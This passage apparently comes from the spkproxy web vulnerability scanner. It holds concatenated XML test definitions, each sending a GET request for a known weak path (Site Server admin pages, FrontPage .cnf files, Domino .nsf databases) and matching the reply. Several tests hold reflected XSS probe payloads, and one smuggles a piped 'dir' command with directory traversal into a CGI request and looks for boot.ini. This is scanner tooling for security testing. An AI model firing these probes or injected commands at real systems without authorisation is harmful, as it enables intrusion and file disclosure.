^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1444.xml0100664000076500007650000000713507566204543017647 0ustar davedave (DSN.asp) "Displays all DSNs configured for selected ODBC drivers." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SiteServer/Admin/commerce/foundation/DSN.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1445.xml0100664000076500007650000000713307566204543017646 0ustar davedave (default.asp) "USed to view current search catalog configurations" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SiteServer/Admin/knowledge/dsmgr/default.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1446.xml0100664000076500007650000000710507566204543017646 0ustar davedave (GroupManager.asp) "Used to create 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1447.xml0100664000076500007650000000710307566204543017645 0ustar davedave (UserManager.asp) "Used to create 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1448.xml0100664000076500007650000000714107566204543017650 0ustar davedave (vs.asp) "Expose various LDAP service and backend configuration parameters" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SiteServer/Admin/knowledge/persmbr/vs.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1449.xml0100664000076500007650000000715507566204543017656 0ustar davedave (VsLsLpRd.asp) "Expose various LDAP service and backend configuration parameters" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-144.xml0100664000076500007650000000740707566204543017565 0ustar davedave (<script>alert('Vulnerable')</script>.jsp) "Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /<script>alert('Vulnerable')</script>.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script>\.jsp 200 <script>alert\('Vulnerable'\)</script>\.jsp 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1450.xml0100664000076500007650000000715707566204543017650 0ustar davedave (VsPrAuoEd.asp) "Expose various LDAP service and backend configuration parameters" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1451.xml0100664000076500007650000000715107566204543017643 0ustar davedave (VsTmPr.asp) "Expose various LDAP service and backend configuration parameters" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SiteServer/Admin/knowledge/persmbr/VsTmPr.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1452.xml0100664000076500007650000000744207566204543017647 0ustar davedave (Default.asp?ctr=\"><script>alert('Vulnerable')</script>) "Site Server is vulnerable to Cross Site Scripting" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-1453.xml0100664000076500007650000000715707566204543017653 0ustar davedave (ViewCode.asp) "The default ViewCode.asp can allow an attacker to read any file on the machine." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SiteServer/Publishing/ViewCode.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1454.xml0100664000076500007650000000721007566204543017642 0ustar davedave (viewcode.asp?source=/default.asp) "May be able to view source code using Site Server vulnerability." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /siteserver/publishing/viewcode.asp?source=/default.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1455.xml0100664000076500007650000000723407566204543017651 0ustar davedave (envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\) "This CGI allows attackers to read files from the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot\.ini 200 boot\.ini 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1456.xml0100664000076500007650000000705607566204543017654 0ustar davedave (/) "Site Server sample files. This might be interresting." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /vc30/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1457.xml0100664000076500007650000000704307566204543017651 0ustar davedave (/) "This might be interresting - User Login" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /_mem_bin/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1458.xml0100664000076500007650000000707107566204543017653 0ustar davedave (auoconfig.asp) "Displays the default AUO (LDAP) schema 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /_mem_bin/auoconfig.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1459.xml0100664000076500007650000000707607566204543017661 0ustar davedave (FormsLogin.asp) "This might be interresting - User Login" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /_mem_bin/FormsLogin.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-145.xml0100664000076500007650000000741707566204543017567 0ustar davedave (<script>alert('Vulnerable')</script>.shtml) "Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /<script>alert('Vulnerable')</script>.shtml HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script>\.shtml 200 <script>alert\('Vulnerable'\)</script>\.shtml 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1460.xml0100664000076500007650000000742407566204543017646 0ustar davedave (formslogin.asp?\"><script>alert('Vulnerable')</script>) "Site Server is vulnerable to Cross Site Scripting" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-1461.xml0100664000076500007650000000714407566204543017646 0ustar davedave (remind.asp) "Page will give the password reminder for any user requested (username must be known)." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /_mem_bin/remind.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1462.xml0100664000076500007650000000717707566204543017655 0ustar davedave (shtml.exe) "shtml.exe is available remotely. Some versionsof the Front Page ISAPI filter are vulnerable to a DOS (not attempted) 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /_vti_bin/shtml.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1463.xml0100664000076500007650000000710007566204543017640 0ustar davedave (access.cnf) "IIS is configured to allow users to read .cnf files 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /_vti_pvt/access.cnf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1464.xml0100664000076500007650000000710207566204543017643 0ustar davedave (service.cnf) "IIS is configured to allow users to read .cnf files 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /_vti_pvt/service.cnf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1465.xml0100664000076500007650000000710407566204543017646 0ustar davedave (services.cnf) "IIS is configured to allow users to read .cnf files 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /_vti_pvt/services.cnf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1466.xml0100664000076500007650000000710007566204543017643 0ustar davedave (svcacl.cnf) "IIS is configured to allow users to read .cnf files 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /_vti_pvt/svcacl.cnf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1467.xml0100664000076500007650000000710207566204543017646 0ustar davedave (writeto.cnf) "IIS is configured to allow users to read .cnf files 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /_vti_pvt/writeto.cnf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-146.xml0100664000076500007650000000741707566204543017570 0ustar davedave (<script>alert('Vulnerable')</script>.thtml) "Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /<script>alert('Vulnerable')</script>.thtml HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script>\.thtml 200 <script>alert\('Vulnerable'\)</script>\.thtml 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-147.xml0100664000076500007650000000744307566204543017570 0ustar davedave (bb000001.pl<script>alert('Vulnerable')</script>) "Actinic E-Commerce services is vulnerable to to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /bb000001.pl<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1487.xml0100664000076500007650000000706607566204543017661 0ustar davedave (./) "Appending '/./' to a directory allows indexing" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /./ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1488.xml0100664000076500007650000000715207566204543017656 0ustar davedave (?OpenServer) "This install allows remote users to enumerate DB names 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /?OpenServer HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ \\/icons\\/abook\\\.gif 200 \\/icons\\/abook\\\.gif 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1489.xml0100664000076500007650000000710107566204543017651 0ustar davedave (agentrunner.nsf) "This database can be read without authentication." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /agentrunner.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-148.xml0100664000076500007650000000760507566204543017571 0ustar davedave (ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&/=acatalog%2f) "Actinic E-Commerce services is vulnerable to to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&/=acatalog%2f HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1490.xml0100664000076500007650000000707307566204543017651 0ustar davedave (bookmark.nsf) "This database can be read without authentication." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /bookmark.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1491.xml0100664000076500007650000000706407566204543017652 0ustar davedave (catalog.nsf) "A list of server databases can be retrieved." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /catalog.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1492.xml0100664000076500007650000000706707566204543017656 0ustar davedave (cersvr.nsf) "Server certificate data can be accessed remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cersvr.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1493.xml0100664000076500007650000000707307566204543017654 0ustar davedave (collect4.nsf) "This database can be read without authentication." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /collect4.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know 